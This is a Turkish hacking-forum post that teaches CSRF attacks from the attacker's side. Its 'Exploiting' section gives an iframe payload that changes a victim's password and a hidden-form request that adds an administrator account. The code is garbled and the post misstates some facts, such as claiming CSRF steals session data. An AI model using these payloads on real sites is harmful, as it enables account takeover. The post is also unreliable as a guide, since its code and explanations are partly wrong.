Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
XSRF-CSRF Açıkları anlatımı
#1
*** Csrf Nedir ***

Cross-Site Request Forgery (Csrf - Xsrf - Cross Site Reference Forgery)

Webmaster’ların Coding & Security bilgi eksikliğinden kaynaklanan güvenlik zaafiyetidir. Site Yetkilisinin Haberi Olmaksızın Güvenlik Açığının İstismar Edilmesidir.


Saldırganın Javascript veya Html Kodlarıyla Yetkilinin Oturum Bilgilerini Çalma Olayıdır.
Kurban Önceden Hazırlanmış Bu Js ve HTML Dosyalarına Tıkladığı Anda Kapana Düşer. Böylelikle Kurbanın Session (Oturum) Bilgileri Saldırgan Tarafından Değiştirilmiş Olur.


*** Csrf Attack Kullanılarak Yapılabilecekler ***

Ben Bu Yöntemi Hayal Gücü İle Sınırlıyorum (Tabi Sistemin Güvenliğini Göz Önünde Bulundurarak) Aklınıza Gelebilecek Herşey ve Sistemin İçeriğine Göre

Saldırganın Tam Yetki Alması Sağlanabilir , Kurbanı Yani Yetkiliyi Devre Dışı Bırakabilir Hatta İleri Düzey Olarak Düşünürsek Banka Hesapları İle Transfer Bile Yapılabilir.


*** Saldırı Öncesi Bilgiler ve Kod Mantığı ***

Kurban.Com/Sifre.php - Kurbanımızın Sifre Değiştirme Paneli

Link Get Methoduyla Alındığından Url Şu Şekilde Değişecektir;

Kurban.Com/Sifre.php?sifre=Root - Burdan Kullanıcının Yeni Şifresinin Root Olduğunu Görebiliyorsunuz.

İşi Kod Mantığına Dökersek GET Metodu İle Gönderilen İstek Şöyledir.

Kod:
<Form Method="Get" Action="Sifre.php">
<Input Type="Text" Name="sifre" />
<Input Type="Submit" Name="Submit" Value="Submit" />
</Form>
Kodları Açıklayalım ;

* User Click Yani Tıklama Anında , Sunucudan Get Methoduyla Bilgileri Çekip, Sifre.php’yi Çalıştırmış Olur.
Kod:
<Form Method="Get" Action="Sifre.php">
* Sonrasında Server Sifre.php’yi Referans Alarak Verileri Çeker.



*** Exploiting ***


Saldırganın Hazırladığı Masum Görünen Ama Zararlı Kodlar Barındıran Sayfamız ;

PHP Kod:
Kurban.Com/PaketEder.htm 

Söylediğimiz Gibi, Dıştan Görünümü Gayet Masum Bir Sayfa.
Fakat, İframe ile , Kurbanın Bilgisi Dışında Şifresi Değişecek ve Kurban Kapana Düşmüş Olacaktır.

İframe Kodlarınızı Biliyoruz Ancak Bilmeyenler İçin Örneklendirirsek ;

PHP Kod:
<iframe src"Http://Kurban.Com/Sifresifre=Root> 

Böylelikle Click Anında Şifre Root Olarak Değişecektir.

CSRF İle Yetkili Şifrelerini Değiştirmenin Yanı Sıra Yetkili Ekleme , Yekili Değiştime , Silme İşlemleri de Yapılabilir.Örnek Verecek Olursak ;

PHP Kod:
<html>
<
form name=admin action=http://kurban/yoneticiaction=user_ekle method=post>
<input type=hidden name=action value=user_ekle><br/>
<
input type=hidden value=usre name=Root><br/>
<
input type=hidden value=pass name=Toor><br/>
<
input type=hidden value=Administrator name=Root><br/>
<
input type=hidden value=email name=root@toor"> 

not:Yeni teğmenlerin Çokca Karıştırdığı Bir Nokta Var.Ona Değinmek İstiyorum.

Cross Site Scripting ve CSRF’nin Aynı Şey Olduğunu Sananlar Var.Aynı Şeyler Değildirler.Xss (Cross Site Scripting ) Açık Olan Sistemden Kurbana

Gerek Kalmadan Direkt Cookie Çekme İşlemidir.

CSRF İse Kurbanın Bilgisizliği ve Zararlı Kodun , Yetkili Kurbana Çalıştırılmasıyla Oluşur.
Beğenenler:
#2
eline saglık biraz daha görsellige dikket edersen daha güzel olacak..
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  CSRF Açığı Nedir? Nasıl Kullanılır? Dark-Capar 3 110 16-08-2016, Saat: 20:41
Son Yorum: ReqDeq
  XSS Açıkları Hakkında Dark-Capar 3 91 14-08-2016, Saat: 22:42
Son Yorum: Dark-Capar
  CSRF Anlamı ve CSRF Açıklarından Yararlanma KingSkrupellos 0 130 01-07-2016, Saat: 02:51
Son Yorum: KingSkrupellos
  Güvenlik Açıkları Geniş Anlatım elzarra 5 246 31-01-2016, Saat: 21:43
Son Yorum: archavin
  Web Güvenlik Açıkları // Soru-Cevap HIDR4 41 3,913 30-01-2016, Saat: 17:01
Son Yorum: KeşapLı
Anahtar Kelimeler

XSRF-CSRF Açıkları anlatımı indir, XSRF-CSRF Açıkları anlatımı Videosu, XSRF-CSRF Açıkları anlatımı Online izle, XSRF-CSRF Açıkları anlatımı Bedava indir, XSRF-CSRF Açıkları anlatımı Yükle, XSRF-CSRF Açıkları anlatımı Hakkında, XSRF-CSRF Açıkları anlatımı Nedir, XSRF-CSRF Açıkları anlatımı Free indir, XSRF-CSRF Açıkları anlatımı Oyunu, XSRF-CSRF Açıkları anlatımı Download


1 Ziyaretçi